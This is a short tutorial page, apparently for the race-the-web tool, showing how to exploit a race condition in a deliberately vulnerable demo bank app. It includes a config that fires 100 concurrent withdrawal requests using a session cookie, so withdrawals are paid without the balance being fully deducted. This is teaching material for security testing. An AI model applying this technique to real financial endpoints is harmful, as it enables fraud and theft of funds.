Instructions

  1. Click “Initialize” to initialize a bank account with $10,000.
  2. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  3. Repeat the request with race-the-web. Your config file should look like the following:
  4. # Make one request
    count = 100
    verbose = true
    [[requests]]
        method = "POST"
        url = "http://racetheweb.io/bank/withdraw"
        # Withdraw 1 dollar
        body = "amount=1"
        # Insert your sessionId cookie below.
        cookies = [“sessionId=<insert here>"]
        redirects = false
    
  5. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.

Aaron Hnatiw 2017